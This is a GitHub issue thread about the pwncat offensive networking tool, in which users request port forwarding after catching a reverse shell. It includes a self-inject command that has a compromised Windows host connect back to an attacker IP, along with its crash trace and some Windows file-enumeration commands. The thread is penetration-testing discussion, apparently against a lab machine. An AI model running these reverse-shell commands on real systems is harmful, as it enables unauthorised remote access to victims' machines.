pwncat icon indicating copy to clipboard operation
pwncat copied to clipboard

Published 20 hours ago verified publisher icon cytopia

Please implement ability to port forward after catching reverse shell

Open zweilosec opened this issue 4 years ago • 5 comments

ISSUE TYPE

  • Feature request

SUMMARY

Currently, you cannot combine a listener (-l) with a port forward (-L or -R). I would like a way to create a port forward through this tunnel after my listener has caught a reverse shell. I recommend implementing a command in the shell similar to the upload or download commands that will allow you to specify ports to forward. reverse and local shouldn't conflict with any host shell commands, or perhaps reverse-pf and local-pf.

Goal

Often I find that after connecting to a machine that I need to add port forwarding for connecting to some service that is running on that machine. I do not currently know an easy way to upgrade a shell with port forwarding other than compiling an exploit and using meterpreter, using plink or chisel, or if I have credentials, using SSH. Most of these require running an additional binary on the host that may or may not be blocked from running.

zweilosec avatar Apr 10 '21 15:04 zweilosec

After playing with using the --self-inject parameter, I believe this would be the easiest way to do this as-is, if the victim was a Unix machine.

pwncat -l 1234 -v --self-inject cmd.exe:10.10.14.187:1235
[PWNCAT CnC] Checking if remote sends greeting...
Spawn Shell...
Microsoft Windows [Version 10.0.17763.1817]
(c) 2018 Microsoft Corporation. All rights reserved.

c:\windows\system32\inetsrv>
[PWNCAT CnC] Checking if remote sends prefix/suffix to every request...
[PWNCAT CnC] Remote does not send prefix
[PWNCAT CnC] Remote does not send suffix
[PWNCAT CnC] Probing for: which python3
Traceback (most recent call last):
  File "/usr/bin/pwncat", line 6352, in <module>
    main()
  File "/usr/bin/pwncat", line 6263, in main
    CNCAutoDeploy(net, cnc_cmd, cnc_host, cnc_ports)
  File "/usr/bin/pwncat", line 4968, in __init__
    super(CNCAutoDeploy, self).__init__(network)
  File "/usr/bin/pwncat", line 4351, in __init__
    if not self.__set_remote_python_path():
  File "/usr/bin/pwncat", line 4821, in __set_remote_python_path
    response = self.remote_command("which {} 2>/dev/null".format(name), True)
  File "/usr/bin/pwncat", line 4632, in remote_command
    return self.send_recv(StringEncoder.encode(command), True, True)
  File "/usr/bin/pwncat", line 4606, in send_recv
    if data in responses[idx]:
IndexError: list index out of range

However, since I am testing with a Windows host as the remote machine, this fails since it requires both a Unix machine with the which command, and python3 to be installed in the host's $PATH.

zweilosec avatar Apr 10 '21 15:04 zweilosec

However, since I am testing with a Windows host

This is still something that lacks implementation. I will have to dig a bit into cmd.exe and powershell.exe capabilities for enumeration and self injection.

cytopia avatar Apr 10 '21 15:04 cytopia

cmd.exe - finds files in %PATH%

where $filename 2>null

For files not in %PATH%

where /R C:\ ping.exe 2>null

Find file by name with PowerShell

Get-Childitem -Path C: -Recurse -ErrorAction SilentlyContinue | ? {$_.Name = $filename}

Enumeration shouldn't be too hard, but I don't know about the self-injection part.

zweilosec avatar Apr 10 '21 16:04 zweilosec

I will probably first have the forwarding feature as a generated payload here: https://github.com/cytopia/kusanagi. Once this is stable I will be looking into backporting it to pwncat automation

cytopia avatar Apr 10 '21 16:04 cytopia

potential solution: upload this python tcp-forward script and execute; there is also a perl version on this site https://mfnttps.github.io/mfnttps/python-portfwd/

ghost-ng avatar Jul 04 '21 14:07 ghost-ng